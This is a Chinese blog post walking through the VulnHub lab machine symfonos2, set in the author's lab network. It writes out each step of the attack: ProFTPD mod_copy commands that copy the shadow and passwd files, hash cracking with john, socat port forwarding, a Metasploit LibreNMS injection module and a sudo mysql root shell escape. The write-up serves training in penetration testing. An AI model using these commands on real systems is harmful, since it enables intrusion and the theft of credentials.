学习笔记-symfonos2-WalkThrough

最新推荐文章于 2024-06-21 15:32:23 发布
最新推荐文章于 2024-06-21 15:32:23 发布
阅读量178 收藏
点赞数
文章标签: 学习 网络 数据库 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35360663/article/details/127694255
版权

symfonos2-WalkThrough

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

靶机地址

Description

OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability. SHOULD work for both VMware and Virtualbox.

知识点

  • smb 信息探测
  • CVE-2015-3306
  • CVE-2018-20434
  • shadow 密码爆破

实验环境

环境仅供参考

  • VMware® Workstation 15 Pro - 15.0.0 build-10134415
  • kali : NAT 模式,192.168.141.134
  • 靶机 : NAT 模式

前期-信息收集

开始进行 IP 探活

nmap -sP 192.168.141.0/24

排除法,去掉自己、宿主机、网关, 192.168.141.149 就是目标了

扫描开放端口

nmap -T5 -A -v -p- 192.168.141.149

21、22、80、139、445

怎么又有 smb,枚举下 smb 试试

enum4linux 192.168.141.149

找到一个 /anonymous 文件夹和 2个用户,进去看看文件

smbclient //192.168.141.149/anonymous -U % -N
ls
cd backups\
ls
get log.txt

查看下 log.txt 可以发现很多线索

开头告诉你 shadow 内容在 backups 目录下,然后后面是 smb 的配置,有个密码

然后开始看 ftp 的配置,配置文件说明了是 ProFTPD 程序,还告诉你有个 aeolus 账号

想起来之前 nmap 扫描 FTP 得到的版本号是 1.3.5,也许可以找找漏洞

searchsploit -w proftpd 1.3.5

这3个都一样,漏洞编号为 CVE-2015-3306,但是这个漏洞只是可以复制文件,并不能直接进行命令执行,并且需要知道目标路径

中期-漏洞利用

这里我们从 log.txt 中可以得知 anonymous 用户的实际路径为 /home/aeolus/share,加上开头告诉你 shadow 文件在 backup 目录下,接下来就尝试将 backup目录下的 shadow 复制到 anonymous 用户目录下

ftp 192.168.141.149
site cpfr /var/backups/shadow.bak
site cpto /home/aeolus/share/shadow.txt

成功了,上 smb 下载下来

smbclient //192.168.141.149/anonymous -U % -N
ls
get shadow.txt
exit
cat shadow.txt

下面用同样的方式下载 passwd 文件

ftp 192.168.141.149
site cpfr /etc/passwd
site cpto /home/aeolus/share/passwd.txt

smbclient //192.168.141.149/anonymous -U % -N
get passwd.txt
exit

mkdir /root/.john
cp passwd.txt /root/.john
cp shadow.txt /root/.john
cd /root/.john
unshadow passwd.txt shadow.txt > hash.txt
cat hash.txt

使用 john 开始跑 hash

gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

只跑出 aeolus 一个用户的密码,使用这个凭证成功 SSH 上去

aeolus  sergioteamo

找找提权的可能

uname -a
sudo -l
find / -perm -u=s 2>/dev/null

没成功,看看 web 方面

又是啥都没有,直接翻 web 配置文件看看

cd /etc/apache2
cat apache2.conf

看看这个端口监听文件

cat ports.conf

端口 8080 有个无法从外部访问的网站,端口转发一下

socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:8080

现在 8080 可以通过 5000 端口访问

找找有没有可利用的漏洞

searchsploit -w librenms

看了下,需要认证,结果用 aeolus sergioteamo 可以登上去,那就用 msf 模块试试

msfconsole
search librenms
use exploit/linux/http/librenms_addhost_cmd_inject
set RHOST 192.168.141.149
set LHOST 192.168.141.134
set PORT 5000
set USERNAME aeolus
set PASSWORD sergioteamo
run

后期-提权

寻找提权利用点

python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l

可以在 gtfobin 找到 mysql 提权的方法 https://gtfobins.github.io/gtfobins/mysql/

sudo mysql -e '\! /bin/sh'

提权成功,感谢靶机作者 Zayotic,和 mzfr 分享的 writeup

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
AI: Web: 1靶机-Walkthrough
ins1ght的博客
09-21 5690
AI: Web: 1靶机,中等难度。使用sqlmap进行webshell的上传,感觉个人的思路稍微有点乱,但这篇文章会让你有观看“现场直播”的感觉,我踩过的坑、犯的低级错误、我的选择,你都可以看到。我觉得一篇好的walkthrough不光应该让人看到“修葺”过的完美思路,使用的技术手段,还应该让人看到我犯过的错,我的选择过程。PS:信息收集是王道。Enjoy!!!
vulnhub- Symfonos 2 (考点:smb & ProFTPD & 端口转发 & librenms & mysql提权)
冬萍子癸水
04-27 604
https://www.vulnhub.com/entry/symfonos-2,331/ nat网络 arp-scan -l 比平常扫出来多的ip就是靶机 nmap 看到21要想到ftp进去找敏感文件。但这里明显提示了proftpd的版本,1.3.5的是有漏洞的。 参考这个类似的靶机joy 22要想到可能的ssh登录或破解 80进web搜集信息 139,445smb进去找敏感文件 PORT ...
symfonos2靶机-Walkthrough
ins1ght的博客
09-07 1706
symfonos2靶机展开的一次“渗透测试”。你可以看到一只菜鸟的个人思路、对网上已有Writeup的复现以及中间遇到的一些问题。
symfonos靶机
haha1314的博客
08-10 757
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2241
AI: Web: 2靶机,中等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
JSP学习笔记-2.pdf
11-28
JSP学习笔记-2.pdf
autokeras学习笔记-安装篇
06-07
autokeras学习笔记-安装篇
go学习笔记-文档-文档
07-21
go学习笔记-文档
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
笔记-webpack5学习指南-V1.0
08-29
笔记-webpack5学习指南-V1.0
oscp——symfonos:2
王嘟嘟的博客
01-16 4550
0x00 前言 这个是练习的第5个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-2,331/ 参考文章 https://www.anquanke.com/post/id/182378 https://blog.csdn.net/weixin_44214107/article/details/100587936 0x01 实验 1.信息收集 1.1 ...
Vulnhub靶机 Symfonos 2
菜浪马废的博客
09-25 390
扫出用户名aeolus aeolus:sergioteamo 用来登录ssh试试 转发8080端口 提权成功 先是enum4linux找到用户名 ftp爆破 发现可以用来登录ssh 找到运行的8080端口 ssh端口转发 访问后发现是cms 找到漏洞 得到下一个用户权限 sudo -l找到mysql gtfobins上找到提权方法 得到root权限 ...
OSCP - symfonos2 writeup
Jiajiajiang_的博客
04-27 474
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos2.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover nmap SMB 尝试使用SMB服务,使用anonymous用户登录, 有一个log.txt的文件,下载下来 读文件,发现shad...
十大成长型思维:定位思维、商业思维、时间管理思维、学习成长思维、精力管理思维、逻辑表达思维、聚焦思维、金字塔原理、目标思维、反思思维
limengshi138392的博客
06-15 1137
十大成长型思维:定位思维、商业思维、时间管理思维、学习成长思维、精力管理思维、逻辑表达思维、聚焦思维、金字塔原理、目标思维、反思思维
充电学习—7、BC1.2 PD协议
wangyongh的博客
06-18 460
PD(portable device,便携式设备)中有个检测VBUS是否有效的电路,电路有个参考值,高于这个值认为VBUS有效,参考值不固定,一般在0.8V~4V之间。首先将PD+即设备的DP拉高至0.6V,然后检测PD-即设备DM的电压,如果小于规定的参考电压,则端口是数据口SDP;首先将PD-拉高至0.6V,然后检测PD+的电压,如果小于参考电压,则端口是CDP;PD快充充电时,DCP协议识别过程,首次检测和二次检测符合BC1.2规定,初始VBUS是5V,识别出DCP之后将VBUS提高至9V。
论文学习_Teams of LLM Agents can Exploit Zero-Day Vulnerabilities
kitsch0x97的博客
06-19 836
研究背景LLM 代理变得越来越复杂,尤其是在网络安全领域。研究表明,当给出漏洞描述和具体问题时,LLM 代理可以有效利用已经存在的漏洞。然而,这些代理在处理零日漏洞时仍然表现不佳。研究内容论文展示了 LLM 代理团队如何实现零日漏洞的有效利用。之前的 LLM 代理在单独使用时很难探索许多不同的漏洞和长期规划。为了解决这个问题,论文引入和 HPTSA 系统,这是一个具有可以启动子代理的规划代理的代理系统。规划代理探索系统并确定要调用哪些子代理,从而解决尝试不同漏洞时的长期规划问题。实验结果。
2024年7月JLPT日语N1真题试卷和答案解析,《Navi日语社》小程序在线答题考试,你的专属考试助手,日语学习神器!
最新发布
工作姬
06-21 289
掌握日语,从日语社小程序开始。这款小程序专为日语学习者设计,提供全面的JLPT备考资源,包括日语N1至N5等级考试的历年真题和2024年最新题目。无论你是日语新手还是备考高手,都能在这里找到适合自己的学习路径。日语社小程序——日语学习的得力助手,助你轻松备考,高效提升。-日语能力考试(JLPT):覆盖N1至N5各级别真题。-日语备考复习:个性化学习计划,智能错题集。-学习指导:树先生日语团队的专业支持。-便捷操作:随时随地,手机端轻松学习。-日语刷题必备:随时随地,高效复习。
零基础入门办公软件速成学习 沈阳电脑办公软件培训
Syasjy的博客
06-21 124
(2)EXCEL:基本操作与数据输入、工作表的数据编辑与格式设置、使用公式与函数处理表格数据、公式审核与高级函数应用、数据分析与管理、使用图表和数据透视表分析数据、工作表的安全与打印输出、数据分析工具、高效办公。(3)PPT:基本操作、创建以文字为主的幻灯片、丰富演示文稿的内容、演示文稿高级美化方法、幻灯片的放映与控制 就业:学完后可从事文秘,数据分析员,数据统计员,销售内勤,后勤,办公室文员,信息录入员等相关工作。员工满意度:提供培训机会显示了公司对员工职业发展的重视,提高了员工的工作满意度和忠诚度。
CNN学习(7):用C++实现简单不同参数的卷积模型
共同学习,共同进步。
06-15 1108
几类简单的卷积操作及可执行程序。
python学习笔记--皮大庆
08-14
《Python学习笔记》是由皮大庆编写的一本关于Python语言学习的教材。在这本书中,作者详细介绍了Python语言的基础知识、语法规则以及常用的编程技巧。 首先,作者简要介绍了Python语言的特点和优势。他提到,Python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值